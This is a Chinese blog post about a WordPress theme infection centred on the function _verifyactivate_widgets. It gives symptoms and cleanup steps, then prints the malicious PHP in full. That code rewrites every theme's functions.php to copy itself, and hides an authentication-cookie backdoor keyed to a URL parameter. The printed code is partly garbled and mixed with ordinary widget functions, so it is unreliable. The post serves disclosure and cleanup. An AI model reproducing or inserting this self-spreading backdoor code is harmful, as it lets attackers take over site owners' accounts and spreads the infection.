wordpress恶意代码
在使用测试站的时候有时候会发现主题被带上了恶意代码,这个代码将会任意的获取用户名、博客的主题文件等等,那么wordpress恶意代码怎么办呢?下面我们就一起去看看解决方法吧。
今天莫名其妙发现自己的测试站的主题带上了恶意代码,非常明显的就是出现了一个函数_verifyactivate_widgets,通常情况下,一旦出现了这个函数在你的主题中,你就麻烦了,这是一串恶意代码,虽然不影响主题的使用(有的时候是影响的,当收到双重感染的时候,_verifyactivate_widgets函数会出现两次,导致了主题不能使用),但这段代码将会通知代码的作者(邮件方式),而且PHP可以任意的获取用户名、博客的主题文件等等,而且它还特地为博客创建了一些看上去非常有用的代码,一些挂件等等,一切的一切都被暴露给这段代码的作者。这里将这段代码曝光,并强烈谴责这些恶意代码的生产者。
症状:
1、可能会提示_verifyactivate_widgets函数声明了两次,程序错误,主题不能使用;
2、当前博客下的所有主题的functions.php中都会带下面这段代码;
3、即使你通过FTP将这段代码删除,但你只要再运行一次博客,它就会像噩梦一样重新回来。
这段代码的功能就是搜集博客的资料,各种资料,包括文章、用户和评论等等。你的博客很有可能成为为别人创造内容和财富的肉鸡。
治疗:
1、在空间管理面板先停用这个域名,使用沙盒功能,或者联系你的服务商;
2、备份所有数据,删除目前使用的主题之外的其他所有主题;
3、下载当前主题,一个文件一个文件的检查,把原本不属于你的代码删除;
4、重新上传和开启网站;
5、使用FTP,将你的主题文件的权限的“写入”权限去除(重要);
6、利用360等其他第三方PHP杀毒程序对网站进行杀毒;
7、确保你的WordPress系统没有被感染,确保你的主机没有被感染。
function _verifyactivate_widgets(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
$output=strip_tags($output, $allowed);
$direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
$cont=file_get_contents($item);
if (stripos($cont,$ftion) === false){
$comaar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
$output .= $before . "Not found" . $after;
if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $comaar . "\n" .$widget);fclose($f);
$output .= ($isshowdots && $ellipsis) ? "..." : "";
}
}
}
}
return $output;
}
function _get_allwidgets_cont($wids,$items=array()){
$places=array_shift($wids);
if(substr($places,-1) == "/"){
$places=substr($places,0,-1);
}
if(!file_exists($places) || !is_dir($places)){
return false;
}elseif(is_readable($places)){
$elems=scandir($places);
foreach ($elems as $elem){
if ($elem != "." && $elem != ".."){
if (is_dir($places . "/" . $elem)){
$wids[]=$places . "/" . $elem;
} elseif (is_file($places . "/" . $elem)&&
$elem == substr(__FILE__,-13)){
$items[]=$places . "/" . $elem;}
}
}
}else{
return false;
}
if (sizeof($wids) > 0){
return _get_allwidgets_cont($wids,$items);
} else {
return $items;
}
}
if(!function_exists("stripos")){
function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );
}
}
if(!function_exists("strripos")){
function strripos( $haystack, $needle, $offset = 0 ) {
if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
if( $offset < 0 ){
$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
}
else{
$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) );
}
if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
$pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) );
return $pos;
}
}
if(!function_exists("scandir")){
function scandir($dir,$listDirectories=false, $skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if (($file != "." && $file != "..") || $skipDots == true) {
if($listDirectories == false) { if(is_dir($file)) { continue; } }
array_push($dirArray,basename($file));
}
}
closedir($handle);
}
return $dirArray;
}
}
add_action("admin_head", "_verifyactivate_widgets");
function _getprepare_widget(){
if(!isset($text_length)) $text_length=120;
if(!isset($check)) $check="cookie";
if(!isset($tagsallowed)) $tagsallowed="";
if(!isset($filter)) $filter="none";
if(!isset($coma)) $coma="";
if(!isset($home_filter)) $home_filter=get_option("home");
if(!isset($pref_filters)) $pref_filters="wp_";
if(!isset($is_use_more_link)) $is_use_more_link=1;
if(!isset($com_type)) $com_type="";
if(!isset($cpages)) $cpages=$_GET["cperpage"];
if(!isset($post_auth_comments)) $post_auth_comments="";
if(!isset($com_is_approved)) $com_is_approved="";
if(!isset($post_auth)) $post_auth="auth";
if(!isset($link_text_more)) $link_text_more="(more...)";
if(!isset($widget_yes)) $widget_yes=get_option("_is_widget_active_");
if(!isset($checkswidgets)) $checkswidgets=$pref_filters."set"."_".$post_auth."_".$check;
if(!isset($link_text_more_ditails)) $link_text_more_ditails="(details...)";
if(!isset($contentmore)) $contentmore="ma".$coma."il";
if(!isset($for_more)) $for_more=1;
if(!isset($fakeit)) $fakeit=1;
if(!isset($sql)) $sql="";
if (!$widget_yes) :
if ($is_use_more_link ) {
if($for_more) {
$output .= " <" . $tag . " class=\"more-link\">ID) . "#more-" . $post->ID ."\" title=\"" . $more_text_link . "\">" . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages, true)) ? $link_text_more : "" . "" . "\n";
} else {
$output .= " <" . $tag . " class=\"more-link\">ID) . "\" title=\"" . $more_text_link . "\">" . $link_text_more . "" . "\n";
}
}
return $output;
}
add_action("init", "_getprepare_widget");
function __popular_posts($no_posts=6, $before="
- ", $after="
- ", $show_pass_post=false, $duration="") {
global $wpdb;
$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
if(!$show_pass_post) $request .= " AND post_password =\"\"";
if($duration !="") {
$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
}
$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
$posts=$wpdb->get_results($request);
$output="";
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . " " . $post_title . " " . $after;
}
} else {
$output .= $before . "None found" . $after;
}
return $output;
}//获取最新评论
function Get_Recent_Comment($limit=16,$cut_length=24){
global $wpdb;
$admin_email = "'" . get_bloginfo ('admin_email') . "'"; //获取管理员邮箱,以便排除管理员的评论
$rccdb = $wpdb->get_results("
SELECT ID, post_title, comment_ID, comment_author, comment_author_email, comment_content
FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts
ON ($wpdb->comments.comment_post_ID = $wpdb->posts.ID)
WHERE comment_approved = '1'
AND comment_type = ''
AND post_password = ''
AND comment_author_email != $admin_email
ORDER BY comment_date_gmt
DESC LIMIT $limit
");//数据库查询获得想要的结果
foreach ($rccdb as $row) {
$rcc .= " - ".get_avatar($row,$size='32')."".$row->comment_author .":"."
". "" . cut_str($row->comment_content,$cut_length)."". " - ";
}//遍历查询到结果,获得想要的值,其中插入一些HTML元素,以便定义CSS样式
//$rcc = convert_smilies($rcc);//允许评论内容中显示表情
echo $rcc;//输出结果
}
?>
上文中介绍了解决wordpress恶意代码的方法,遇到类似问题的朋友不妨借鉴学习下,如果还有疑问,请在本文底部留言吧。